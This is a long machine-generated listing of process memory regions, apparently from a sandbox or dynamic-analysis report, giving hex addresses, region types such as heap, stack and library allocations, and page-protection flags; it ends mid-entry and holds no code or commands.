7FFB4AD10000
|
trusted library allocation
|
page read and write
|
||
289BFA70000
|
heap
|
page read and write
|
||
7FFB4AB76000
|
trusted library allocation
|
page read and write
|
||
A93000
|
unkown
|
page write copy
|
||
156B7698000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF10000
|
trusted library allocation
|
page read and write
|
||
26EEAC60000
|
unkown
|
page read and write
|
||
7FF6687E1000
|
unkown
|
page execute read
|
||
26EEA6C0000
|
heap
|
page read and write
|
||
7FFB4AE6C000
|
trusted library allocation
|
page read and write
|
||
2595CF85000
|
heap
|
page read and write
|
||
3C9E000
|
stack
|
page read and write
|
||
7FFB4AE30000
|
trusted library allocation
|
page read and write
|
||
11BE000
|
stack
|
page read and write
|
||
7FFB4AB1C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF668D69000
|
unkown
|
page readonly
|
||
7FFB4AADD000
|
trusted library allocation
|
page execute and read and write
|
||
1304000
|
heap
|
page read and write
|
||
7FFB4ACF0000
|
trusted library allocation
|
page read and write
|
||
8F6000
|
stack
|
page read and write
|
||
7FFB4AAC3000
|
trusted library allocation
|
page execute and read and write
|
||
156B7E51000
|
trusted library allocation
|
page read and write
|
||
2750000
|
heap
|
page read and write
|
||
26E81AE3000
|
trusted library allocation
|
page read and write
|
||
7C9000
|
heap
|
page read and write
|
||
B52413B000
|
stack
|
page read and write
|
||
1E1AFD9D000
|
heap
|
page read and write
|
||
26EEA640000
|
heap
|
page execute and read and write
|
||
26EE8AD0000
|
heap
|
page read and write
|
||
1CA20000
|
heap
|
page execute and read and write
|
||
11CF000
|
stack
|
page read and write
|
||
289A7410000
|
heap
|
page read and write
|
||
7FFB4AEC0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD30000
|
trusted library allocation
|
page read and write
|
||
156B827C000
|
trusted library allocation
|
page read and write
|
||
156B5140000
|
trusted library section
|
page read and write
|
||
47E000
|
heap
|
page read and write
|
||
7FFB4AB14000
|
trusted library allocation
|
page read and write
|
||
32E0000
|
heap
|
page read and write
|
||
2EBB000
|
stack
|
page read and write
|
||
81B000
|
heap
|
page read and write
|
||
CB114FC000
|
stack
|
page read and write
|
||
3D9F000
|
stack
|
page read and write
|
||
30F0000
|
heap
|
page read and write
|
||
7FF68E161000
|
unkown
|
page execute read
|
||
3448000
|
heap
|
page read and write
|
||
7FFB4AC90000
|
trusted library allocation
|
page read and write
|
||
7FFB4AAF3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4ACF0000
|
trusted library allocation
|
page read and write
|
||
E4E000
|
stack
|
page read and write
|
||
289A5C25000
|
heap
|
page read and write
|
||
E5E3FE000
|
stack
|
page read and write
|
||
7FFB4AF20000
|
trusted library allocation
|
page read and write
|
||
26EEACA0000
|
heap
|
page execute and read and write
|
||
A40000
|
heap
|
page read and write
|
||
7FFB4AB0D000
|
trusted library allocation
|
page execute and read and write
|
||
289A74D0000
|
heap
|
page execute and read and write
|
||
7DF428290000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AC8A000
|
trusted library allocation
|
page read and write
|
||
289A8980000
|
trusted library allocation
|
page read and write
|
||
1E195F20000
|
trusted library allocation
|
page read and write
|
||
7FFB4ABA6000
|
trusted library allocation
|
page read and write
|
||
412000
|
unkown
|
page readonly
|
||
EF6000
|
stack
|
page read and write
|
||
7FFB4AAEB000
|
trusted library allocation
|
page read and write
|
||
331D000
|
heap
|
page read and write
|
||
A72EC4E000
|
stack
|
page read and write
|
||
32E5000
|
heap
|
page read and write
|
||
7FFB4AD50000
|
trusted library allocation
|
page read and write
|
||
8DE386D000
|
stack
|
page read and write
|
||
7E2000
|
unkown
|
page readonly
|
||
7FFB4ADC0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF31000
|
trusted library allocation
|
page read and write
|
||
156B86D4000
|
trusted library allocation
|
page read and write
|
||
2595E7D7000
|
heap
|
page read and write
|
||
2D4D000
|
stack
|
page read and write
|
||
11FE000
|
stack
|
page read and write
|
||
315F000
|
stack
|
page read and write
|
||
1E1A79F1000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACC0000
|
trusted library allocation
|
page execute and read and write
|
||
24BFB0E000
|
stack
|
page read and write
|
||
7FFB4AE38000
|
trusted library allocation
|
page read and write
|
||
10EF000
|
stack
|
page read and write
|
||
7FFB4AE42000
|
trusted library allocation
|
page read and write
|
||
331C000
|
heap
|
page read and write
|
||
156CEB50000
|
heap
|
page read and write
|
||
103E000
|
stack
|
page read and write
|
||
7FFB4ACB7000
|
trusted library allocation
|
page read and write
|
||
32E1000
|
heap
|
page read and write
|
||
1E1993C7000
|
trusted library allocation
|
page read and write
|
||
7FFB4AAC4000
|
trusted library allocation
|
page read and write
|
||
289A5C30000
|
heap
|
page read and write
|
||
26EEA870000
|
heap
|
page read and write
|
||
32E9000
|
heap
|
page read and write
|
||
1E1979B0000
|
heap
|
page execute and read and write
|
||
7FFB4ACF0000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
AA5000
|
unkown
|
page readonly
|
||
156C6B71000
|
trusted library allocation
|
page read and write
|
||
2595E775000
|
heap
|
page read and write
|
||
CB118FF000
|
stack
|
page read and write
|
||
7C1000
|
heap
|
page read and write
|
||
331D000
|
heap
|
page read and write
|
||
BFC000
|
stack
|
page read and write
|
||
405E000
|
stack
|
page read and write
|
||
2595E7D5000
|
heap
|
page read and write
|
||
2DD0000
|
heap
|
page read and write
|
||
414000
|
unkown
|
page write copy
|
||
156CF013000
|
heap
|
page read and write
|
||
2595CF5B000
|
heap
|
page read and write
|
||
7FFB4AECC000
|
trusted library allocation
|
page read and write
|
||
310F000
|
stack
|
page read and write
|
||
12C5000
|
heap
|
page read and write
|
||
7FFB4AE60000
|
trusted library allocation
|
page read and write
|
||
32F5000
|
heap
|
page read and write
|
||
156B6BD0000
|
trusted library allocation
|
page read and write
|
||
2DFE000
|
stack
|
page read and write
|
||
2FA0000
|
heap
|
page read and write
|
||
289BFE85000
|
heap
|
page read and write
|
||
7FFB4AF10000
|
trusted library allocation
|
page execute and read and write
|
||
289A91D9000
|
trusted library allocation
|
page read and write
|
||
E8E000
|
stack
|
page read and write
|
||
156C6E54000
|
trusted library allocation
|
page read and write
|
||
156B4F59000
|
heap
|
page read and write
|
||
26EE8C9D000
|
heap
|
page read and write
|
||
7FFB4AB00000
|
trusted library allocation
|
page read and write
|
||
7FFB4AB2C000
|
trusted library allocation
|
page execute and read and write
|
||
1E1977C0000
|
heap
|
page read and write
|
||
CB113FF000
|
stack
|
page read and write
|
||
3398000
|
heap
|
page read and write
|
||
11000
|
unkown
|
page execute read
|
||
7FFB4AEE0000
|
trusted library allocation
|
page read and write
|
||
24BEEB9000
|
stack
|
page read and write
|
||
289B798A000
|
trusted library allocation
|
page read and write
|
||
26EEA430000
|
heap
|
page readonly
|
||
803000
|
heap
|
page read and write
|
||
24EBE2D0000
|
unkown
|
page read and write
|
||
7FFB4AD90000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE34000
|
trusted library allocation
|
page read and write
|
||
156C6B51000
|
trusted library allocation
|
page read and write
|
||
289A9252000
|
trusted library allocation
|
page read and write
|
||
43DF000
|
stack
|
page read and write
|
||
1E197780000
|
trusted library allocation
|
page read and write
|
||
455E000
|
stack
|
page read and write
|
||
1090000
|
heap
|
page read and write
|
||
1E197740000
|
trusted library allocation
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
81D000
|
heap
|
page read and write
|
||
A72DCFA000
|
stack
|
page read and write
|
||
1E1B0152000
|
heap
|
page read and write
|
||
156CF35F000
|
heap
|
page read and write
|
||
7FFB4ACB0000
|
trusted library allocation
|
page execute and read and write
|
||
24BEE37000
|
stack
|
page read and write
|
||
3EAE000
|
stack
|
page read and write
|
||
7FFB4AADB000
|
trusted library allocation
|
page read and write
|
||
289A8978000
|
trusted library allocation
|
page read and write
|
||
1E1A79E1000
|
trusted library allocation
|
page read and write
|
||
23069870000
|
heap
|
page read and write
|
||
7FFB4ABB6000
|
trusted library allocation
|
page execute and read and write
|
||
156B6960000
|
trusted library allocation
|
page read and write
|
||
A91000
|
heap
|
page read and write
|
||
7FFB4AD10000
|
trusted library allocation
|
page read and write
|
||
26E902EC000
|
trusted library allocation
|
page read and write
|
||
313E000
|
stack
|
page read and write
|
||
1C62D000
|
stack
|
page read and write
|
||
28AF000
|
stack
|
page read and write
|
||
7FFB4ADD0000
|
trusted library allocation
|
page read and write
|
||
289A90A9000
|
trusted library allocation
|
page read and write
|
||
7CF000
|
heap
|
page read and write
|
||
7FFB4AAF4000
|
trusted library allocation
|
page read and write
|
||
3720000
|
heap
|
page read and write
|
||
2595CF85000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
9EF000
|
stack
|
page read and write
|
||
162A6A90000
|
unkown
|
page read and write
|
||
32E5000
|
heap
|
page read and write
|
||
156B4F5D000
|
heap
|
page read and write
|
||
156B859A000
|
trusted library allocation
|
page read and write
|
||
294E000
|
stack
|
page read and write
|
||
2596328A000
|
heap
|
page read and write
|
||
B523CF9000
|
stack
|
page read and write
|
||
670000
|
heap
|
page read and write
|
||
7FFB4AB1B000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AE90000
|
trusted library allocation
|
page read and write
|
||
12AA000
|
heap
|
page read and write
|
||
29E0000
|
heap
|
page read and write
|
||
289A5A20000
|
heap
|
page read and write
|
||
7FFB4AE32000
|
trusted library allocation
|
page read and write
|
||
156B5190000
|
trusted library allocation
|
page read and write
|
||
414000
|
unkown
|
page read and write
|
||
7FFB4AD30000
|
trusted library allocation
|
page read and write
|
||
2595E750000
|
direct allocation
|
page execute read
|
||
26E80088000
|
trusted library allocation
|
page read and write
|
||
32CF000
|
stack
|
page read and write
|
||
2595E770000
|
heap
|
page read and write
|
||
12AE000
|
heap
|
page read and write
|
||
DD5000
|
heap
|
page read and write
|
||
7FFB4ADA0000
|
trusted library allocation
|
page read and write
|
||
2595CED6000
|
heap
|
page read and write
|
||
7FFB4ADD0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE29000
|
trusted library allocation
|
page read and write
|
||
7FFB4AEE0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AEE0000
|
trusted library allocation
|
page read and write
|
||
7FFB4ADE0000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACA7000
|
trusted library allocation
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
B99000
|
heap
|
page read and write
|
||
32FE000
|
stack
|
page read and write
|
||
7FFB4AF20000
|
trusted library allocation
|
page read and write
|
||
93E000
|
stack
|
page read and write
|
||
3F1E000
|
stack
|
page read and write
|
||
2595E7FC000
|
heap
|
page read and write
|
||
7FFB4AE40000
|
trusted library allocation
|
page read and write
|
||
7FFB4ADE0000
|
trusted library allocation
|
page read and write
|
||
32EF000
|
stack
|
page read and write
|
||
6FD000
|
stack
|
page read and write
|
||
B523D3E000
|
stack
|
page read and write
|
||
32E3000
|
heap
|
page read and write
|
||
2D9F000
|
stack
|
page read and write
|
||
11000
|
unkown
|
page execute read
|
||
5F0000
|
heap
|
page read and write
|
||
10B5000
|
heap
|
page read and write
|
||
7FFB4AEF0000
|
trusted library allocation
|
page read and write
|
||
1E195CDE000
|
heap
|
page read and write
|
||
9EB07ED000
|
stack
|
page read and write
|
||
1E1986E2000
|
trusted library allocation
|
page read and write
|
||
7FFB4ADB0000
|
trusted library allocation
|
page read and write
|
||
720000
|
heap
|
page read and write
|
||
2595CF2A000
|
heap
|
page read and write
|
||
26921400000
|
heap
|
page read and write
|
||
1E195D2B000
|
heap
|
page read and write
|
||
26EEACA7000
|
heap
|
page execute and read and write
|
||
2D5E000
|
stack
|
page read and write
|
||
1E195D27000
|
heap
|
page read and write
|
||
7FF68E6F5000
|
unkown
|
page write copy
|
||
7FFB4AEDA000
|
trusted library allocation
|
page read and write
|
||
26EEA520000
|
trusted library allocation
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
9EB07FD000
|
stack
|
page read and write
|
||
1E1AFF90000
|
heap
|
page read and write
|
||
156B6A30000
|
heap
|
page execute and read and write
|
||
26EEB359000
|
heap
|
page read and write
|
||
33E0000
|
heap
|
page read and write
|
||
156B7D43000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF5D000
|
trusted library allocation
|
page read and write
|
||
24BEFBE000
|
stack
|
page read and write
|
||
1E195EF5000
|
heap
|
page read and write
|
||
24BECFD000
|
stack
|
page read and write
|
||
7FFB4AAFB000
|
trusted library allocation
|
page execute and read and write
|
||
26EE8C59000
|
heap
|
page read and write
|
||
289BFC57000
|
heap
|
page read and write
|
||
289A94E1000
|
trusted library allocation
|
page read and write
|
||
26EE8C30000
|
trusted library section
|
page read and write
|
||
7FFB4ADC0000
|
trusted library allocation
|
page read and write
|
||
243E000
|
stack
|
page read and write
|
||
7FFB4AD50000
|
trusted library allocation
|
page read and write
|
||
A72DE7D000
|
stack
|
page read and write
|
||
7FFB4ADF0000
|
trusted library allocation
|
page read and write
|
||
1E1B0042000
|
heap
|
page read and write
|
||
8FC000
|
stack
|
page read and write
|
||
289A5AA6000
|
heap
|
page read and write
|
||
289C0203000
|
heap
|
page read and write
|
||
11F5000
|
stack
|
page read and write
|
||
156B8424000
|
trusted library allocation
|
page read and write
|
||
7FFB4AB7C000
|
trusted library allocation
|
page execute and read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
31BD000
|
stack
|
page read and write
|
||
23069860000
|
heap
|
page read and write
|
||
7FFB4AF40000
|
trusted library allocation
|
page read and write
|
||
1E195CFE000
|
heap
|
page read and write
|
||
162A6B40000
|
heap
|
page read and write
|
||
289B7985000
|
trusted library allocation
|
page read and write
|
||
3270000
|
heap
|
page read and write
|
||
7FFB4AB76000
|
trusted library allocation
|
page read and write
|
||
80B000
|
heap
|
page read and write
|
||
156B8293000
|
trusted library allocation
|
page read and write
|
||
12C5000
|
heap
|
page read and write
|
||
7FFB4AD20000
|
trusted library allocation
|
page read and write
|
||
156CF386000
|
heap
|
page read and write
|
||
2595E7CC000
|
heap
|
page read and write
|
||
2B7E000
|
stack
|
page read and write
|
||
7FFB4AE24000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD30000
|
trusted library allocation
|
page read and write
|
||
7FFB4ADE0000
|
trusted library allocation
|
page read and write
|
||
940000
|
heap
|
page read and write
|
||
156B50E0000
|
heap
|
page read and write
|
||
81B000
|
heap
|
page read and write
|
||
1E1AFE93000
|
heap
|
page read and write
|
||
F7977FF000
|
stack
|
page read and write
|
||
156B5160000
|
trusted library allocation
|
page read and write
|
||
7FF6E699A000
|
unkown
|
page read and write
|
||
7CC000
|
heap
|
page read and write
|
||
2595E780000
|
heap
|
page read and write
|
||
32F1000
|
heap
|
page read and write
|
||
600000
|
heap
|
page read and write
|
||
12257ED000
|
stack
|
page read and write
|
||
1E197976000
|
heap
|
page execute and read and write
|
||
7FFB4AF62000
|
trusted library allocation
|
page read and write
|
||
156B86A9000
|
trusted library allocation
|
page read and write
|
||
289A5A29000
|
heap
|
page read and write
|
||
1E1A79C1000
|
trusted library allocation
|
page read and write
|
||
2DFE000
|
stack
|
page read and write
|
||
7FFB4ADBF000
|
trusted library allocation
|
page read and write
|
||
156CF3A5000
|
heap
|
page read and write
|
||
7FFB4AF70000
|
trusted library allocation
|
page read and write
|
||
1E195E90000
|
heap
|
page read and write
|
||
7E3000
|
heap
|
page read and write
|
||
26E90001000
|
trusted library allocation
|
page read and write
|
||
156B85BB000
|
trusted library allocation
|
page read and write
|
||
8EE000
|
stack
|
page read and write
|
||
331C000
|
heap
|
page read and write
|
||
156B7E5B000
|
trusted library allocation
|
page read and write
|
||
414000
|
unkown
|
page readonly
|
||
7FFB4AB70000
|
trusted library allocation
|
page read and write
|
||
24EBE0D0000
|
heap
|
page read and write
|
||
12E8000
|
heap
|
page read and write
|
||
26EEAFFE000
|
heap
|
page read and write
|
||
289BFABB000
|
heap
|
page read and write
|
||
156CF3E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AC71000
|
trusted library allocation
|
page read and write
|
||
451F000
|
stack
|
page read and write
|
||
26921610000
|
unkown
|
page read and write
|
||
289A7575000
|
heap
|
page read and write
|
||
156B825F000
|
trusted library allocation
|
page read and write
|
||
289A5AEA000
|
heap
|
page read and write
|
||
7FF6E6980000
|
unkown
|
page readonly
|
||
7FFB4AACD000
|
trusted library allocation
|
page execute and read and write
|
||
F60000
|
heap
|
page read and write
|
||
B5239FE000
|
stack
|
page read and write
|
||
81B000
|
heap
|
page read and write
|
||
1E1983BF000
|
trusted library allocation
|
page read and write
|
||
EFA000
|
stack
|
page read and write
|
||
1E197970000
|
heap
|
page execute and read and write
|
||
7FFB4AF65000
|
trusted library allocation
|
page read and write
|
||
7FFB4AAE0000
|
trusted library allocation
|
page read and write
|
||
289BFDFF000
|
heap
|
page read and write
|
||
7FFB4AAD0000
|
trusted library allocation
|
page read and write
|
||
13EB3000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD90000
|
trusted library allocation
|
page read and write
|
||
3250000
|
heap
|
page read and write
|
||
7FFB4AB7C000
|
trusted library allocation
|
page execute and read and write
|
||
26EE8CAF000
|
heap
|
page read and write
|
||
7FFB4AADB000
|
trusted library allocation
|
page read and write
|
||
2596468A000
|
heap
|
page read and write
|
||
15000
|
unkown
|
page readonly
|
||
7FFB4AAC0000
|
trusted library allocation
|
page read and write
|
||
7FF6687E0000
|
unkown
|
page readonly
|
||
A72DBFE000
|
stack
|
page read and write
|
||
7FF6687E1000
|
unkown
|
page execute read
|
||
289A7470000
|
trusted library allocation
|
page read and write
|
||
2D0D000
|
stack
|
page read and write
|
||
7FFB4AAD2000
|
trusted library allocation
|
page read and write
|
||
E5DF7E000
|
stack
|
page read and write
|
||
126E000
|
stack
|
page read and write
|
||
1E1AFD79000
|
heap
|
page read and write
|
||
26E90031000
|
trusted library allocation
|
page read and write
|
||
7B2000
|
heap
|
page read and write
|
||
1E1AFDF6000
|
heap
|
page read and write
|
||
289BFC3A000
|
heap
|
page read and write
|
||
331A000
|
heap
|
page read and write
|
||
29E8000
|
heap
|
page read and write
|
||
7FFB4AD80000
|
trusted library allocation
|
page read and write
|
||
A72E17E000
|
stack
|
page read and write
|
||
12A0000
|
heap
|
page read and write
|
||
1E1979C1000
|
trusted library allocation
|
page read and write
|
||
FAE000
|
stack
|
page read and write
|
||
808000
|
heap
|
page read and write
|
||
7FFB4AB80000
|
trusted library allocation
|
page read and write
|
||
7FFB4AC72000
|
trusted library allocation
|
page read and write
|
||
7FFB4AB1C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AF00000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AAE0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE00000
|
trusted library allocation
|
page read and write
|
||
26AD000
|
stack
|
page read and write
|
||
7FFB4ACE0000
|
trusted library allocation
|
page read and write
|
||
DBE000
|
stack
|
page read and write
|
||
7FFB4AC90000
|
trusted library allocation
|
page execute and read and write
|
||
26E81974000
|
trusted library allocation
|
page read and write
|
||
156B4F22000
|
heap
|
page read and write
|
||
35CB000
|
stack
|
page read and write
|
||
24BEAFE000
|
stack
|
page read and write
|
||
429F000
|
stack
|
page read and write
|
||
437DF9C000
|
stack
|
page read and write
|
||
30BE000
|
stack
|
page read and write
|
||
7FFB4AF00000
|
trusted library allocation
|
page read and write
|
||
1E199535000
|
trusted library allocation
|
page read and write
|
||
7FFB4AC92000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD00000
|
trusted library allocation
|
page read and write
|
||
32FA000
|
heap
|
page read and write
|
||
1E1B0190000
|
trusted library allocation
|
page read and write
|
||
1E198553000
|
trusted library allocation
|
page read and write
|
||
3AA0000
|
heap
|
page execute and read and write
|
||
A72DB7E000
|
stack
|
page read and write
|
||
7FFB4AAC3000
|
trusted library allocation
|
page execute and read and write
|
||
7E1000
|
unkown
|
page execute read
|
||
7FFB4AE62000
|
trusted library allocation
|
page read and write
|
||
7FFB4AAD4000
|
trusted library allocation
|
page read and write
|
||
7FF6E69A5000
|
unkown
|
page read and write
|
||
7FFB4AF00000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE13000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF60000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF10000
|
trusted library allocation
|
page read and write
|
||
307E000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
7FFB4AADD000
|
trusted library allocation
|
page execute and read and write
|
||
1E198CAA000
|
trusted library allocation
|
page read and write
|
||
156B51A0000
|
heap
|
page readonly
|
||
24EBE310000
|
unkown
|
page read and write
|
||
7FFB4ACE0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE35000
|
trusted library allocation
|
page read and write
|
||
7C3000
|
heap
|
page read and write
|
||
7FFB4AC90000
|
trusted library allocation
|
page execute and read and write
|
||
7FF668D69000
|
unkown
|
page readonly
|
||
7FFB4ACA0000
|
trusted library allocation
|
page execute and read and write
|
||
28B0000
|
heap
|
page read and write
|
||
E5DE7E000
|
stack
|
page read and write
|
||
7FFB4AD00000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD80000
|
trusted library allocation
|
page read and write
|
||
289A5A6D000
|
heap
|
page read and write
|
||
289BFDDB000
|
heap
|
page read and write
|
||
5E7000
|
heap
|
page read and write
|
||
31D0000
|
heap
|
page read and write
|
||
1040000
|
heap
|
page read and write
|
||
33F0000
|
heap
|
page read and write
|
||
3301000
|
heap
|
page read and write
|
||
7FFB4AE00000
|
trusted library allocation
|
page read and write
|
||
7FFB4AC60000
|
trusted library allocation
|
page read and write
|
||
7FFB4ADD0000
|
trusted library allocation
|
page read and write
|
||
156C6BBC000
|
trusted library allocation
|
page read and write
|
||
162A6A70000
|
heap
|
page read and write
|
||
11CE000
|
stack
|
page read and write
|
||
289A757A000
|
heap
|
page read and write
|
||
7FFB4AB1C000
|
trusted library allocation
|
page execute and read and write
|
||
12000
|
unkown
|
page readonly
|
||
9C0000
|
heap
|
page read and write
|
||
7FF6687FB000
|
unkown
|
page read and write
|
||
32FF000
|
heap
|
page read and write
|
||
26E812EF000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF20000
|
trusted library allocation
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
353C000
|
stack
|
page read and write
|
||
7FFB4ABA6000
|
trusted library allocation
|
page execute and read and write
|
||
156B4F2F000
|
heap
|
page read and write
|
||
7FFB4AC81000
|
trusted library allocation
|
page read and write
|
||
1E1AFD00000
|
heap
|
page read and write
|
||
53E000
|
stack
|
page read and write
|
||
414000
|
unkown
|
page write copy
|
||
7DF4282A0000
|
trusted library allocation
|
page execute and read and write
|
||
E5F0CA000
|
stack
|
page read and write
|
||
FEE000
|
stack
|
page read and write
|
||
B5240BE000
|
stack
|
page read and write
|
||
A91000
|
unkown
|
page execute read
|
||
26EEA500000
|
trusted library allocation
|
page read and write
|
||
A72E27C000
|
stack
|
page read and write
|
||
CB112FE000
|
stack
|
page read and write
|
||
1E195E70000
|
heap
|
page read and write
|
||
B07000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
7C9000
|
heap
|
page read and write
|
||
280E000
|
stack
|
page read and write
|
||
401F000
|
stack
|
page read and write
|
||
30FE000
|
stack
|
page read and write
|
||
290F000
|
stack
|
page read and write
|
||
289BFB37000
|
heap
|
page execute and read and write
|
||
803000
|
heap
|
page read and write
|
||
B523C7D000
|
stack
|
page read and write
|
||
7FFB4AD90000
|
trusted library allocation
|
page read and write
|
||
5AE000
|
stack
|
page read and write
|
||
7FFB4AAD0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE29000
|
trusted library allocation
|
page read and write
|
||
2595CF60000
|
heap
|
page read and write
|
||
7FFB4AAE4000
|
trusted library allocation
|
page read and write
|
||
B1D000
|
heap
|
page read and write
|
||
7FF68E17B000
|
unkown
|
page write copy
|
||
1350000
|
trusted library allocation
|
page read and write
|
||
1E1997FD000
|
trusted library allocation
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
CB10FC9000
|
stack
|
page read and write
|
||
358E000
|
stack
|
page read and write
|
||
1E1B0066000
|
heap
|
page read and write
|
||
247E000
|
stack
|
page read and write
|
||
A72DAFE000
|
stack
|
page read and write
|
||
26EEADD0000
|
heap
|
page read and write
|
||
5FE000
|
stack
|
page read and write
|
||
CB116FE000
|
stack
|
page read and write
|
||
2E1E000
|
stack
|
page read and write
|
||
A72E1FE000
|
stack
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
1E1B00AB000
|
heap
|
page read and write
|
||
156B83DA000
|
trusted library allocation
|
page read and write
|
||
3260000
|
heap
|
page read and write
|
||
7FF68E6F2000
|
unkown
|
page write copy
|
||
7FFB4AE38000
|
trusted library allocation
|
page read and write
|
||
1E1B00E9000
|
heap
|
page read and write
|
||
CB1197E000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
7CF000
|
heap
|
page read and write
|
||
2595E890000
|
heap
|
page readonly
|
||
26EE8C91000
|
heap
|
page read and write
|
||
159E000
|
stack
|
page read and write
|
||
7FFB4AACD000
|
trusted library allocation
|
page execute and read and write
|
||
7E2000
|
unkown
|
page readonly
|
||
E5EF4E000
|
stack
|
page read and write
|
||
26E812F8000
|
trusted library allocation
|
page read and write
|
||
1E1AFD3F000
|
heap
|
page read and write
|
||
14000
|
unkown
|
page read and write
|
||
F90000
|
heap
|
page read and write
|
||
7E3000
|
unkown
|
page write copy
|
||
1E19946D000
|
trusted library allocation
|
page read and write
|
||
156B4EE0000
|
heap
|
page read and write
|
||
26E902F2000
|
trusted library allocation
|
page read and write
|
||
3314000
|
heap
|
page read and write
|
||
7FF68E6F6000
|
unkown
|
page readonly
|
||
1250000
|
heap
|
page read and write
|
||
38DE000
|
stack
|
page read and write
|
||
19D000
|
stack
|
page read and write
|
||
1E1A7CA5000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACE0000
|
trusted library allocation
|
page read and write
|
||
289A5A7F000
|
heap
|
page read and write
|
||
26EE000
|
stack
|
page read and write
|
||
2FBF000
|
stack
|
page read and write
|
||
156B6990000
|
trusted library allocation
|
page read and write
|
||
156B81F6000
|
trusted library allocation
|
page read and write
|
||
C4E000
|
heap
|
page read and write
|
||
7FFB4AE4C000
|
trusted library allocation
|
page read and write
|
||
289A7726000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACD2000
|
trusted library allocation
|
page read and write
|
||
12E8000
|
heap
|
page read and write
|
||
1310000
|
heap
|
page read and write
|
||
1E199570000
|
trusted library allocation
|
page read and write
|
||
26E812D9000
|
trusted library allocation
|
page read and write
|
||
1290000
|
heap
|
page read and write
|
||
410000
|
unkown
|
page readonly
|
||
7FFB4AE60000
|
trusted library allocation
|
page read and write
|
||
A72DDFA000
|
stack
|
page read and write
|
||
E5E07E000
|
stack
|
page read and write
|
||
7FFB4AB8C000
|
trusted library allocation
|
page execute and read and write
|
||
289A8604000
|
trusted library allocation
|
page read and write
|
||
1E1B015C000
|
heap
|
page read and write
|
||
24BF03F000
|
stack
|
page read and write
|
||
2595CE90000
|
heap
|
page read and write
|
||
3314000
|
heap
|
page read and write
|
||
331C000
|
heap
|
page read and write
|
||
32E7000
|
heap
|
page read and write
|
||
7FFB4ABE6000
|
trusted library allocation
|
page execute and read and write
|
||
479F000
|
stack
|
page read and write
|
||
26EEB002000
|
heap
|
page read and write
|
||
156CEFA0000
|
heap
|
page read and write
|
||
24BFC8A000
|
stack
|
page read and write
|
||
7FFB4AE24000
|
trusted library allocation
|
page read and write
|
||
1326000
|
heap
|
page read and write
|
||
230698D8000
|
heap
|
page read and write
|
||
26EEB0AA000
|
heap
|
page read and write
|
||
120E000
|
stack
|
page read and write
|
||
26EE8C50000
|
heap
|
page read and write
|
||
B52397E000
|
stack
|
page read and write
|
||
156B7A6F000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE3C000
|
trusted library allocation
|
page read and write
|
||
ECE000
|
stack
|
page read and write
|
||
7FFB4AADD000
|
trusted library allocation
|
page execute and read and write
|
||
156CF312000
|
heap
|
page read and write
|
||
E5DEFE000
|
stack
|
page read and write
|
||
42DE000
|
stack
|
page read and write
|
||
AE8000
|
heap
|
page read and write
|
||
7FFB4AC80000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4ABE0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AE10000
|
trusted library allocation
|
page read and write
|
||
289A80A0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE3C000
|
trusted library allocation
|
page read and write
|
||
B49000
|
heap
|
page read and write
|
||
289A914F000
|
trusted library allocation
|
page read and write
|
||
2B8F000
|
stack
|
page read and write
|
||
230698B0000
|
heap
|
page read and write
|
||
687000
|
heap
|
page read and write
|
||
16DE000
|
stack
|
page read and write
|
||
2595E7C8000
|
heap
|
page read and write
|
||
81D000
|
heap
|
page read and write
|
||
10000
|
unkown
|
page readonly
|
||
384C000
|
stack
|
page read and write
|
||
7FFB4AAFD000
|
trusted library allocation
|
page execute and read and write
|
||
756000
|
heap
|
page read and write
|
||
26E902E5000
|
trusted library allocation
|
page read and write
|
||
26EEAD03000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
26E811A7000
|
trusted library allocation
|
page read and write
|
||
A72DEF8000
|
stack
|
page read and write
|
||
7FFB4AD90000
|
trusted library allocation
|
page read and write
|
||
1359000
|
heap
|
page read and write
|
||
7FFB4AF10000
|
trusted library allocation
|
page read and write
|
||
269213A0000
|
heap
|
page read and write
|
||
7E1000
|
unkown
|
page execute read
|
||
24BEA7E000
|
stack
|
page read and write
|
||
1E1AFF70000
|
heap
|
page read and write
|
||
7FFB4AE70000
|
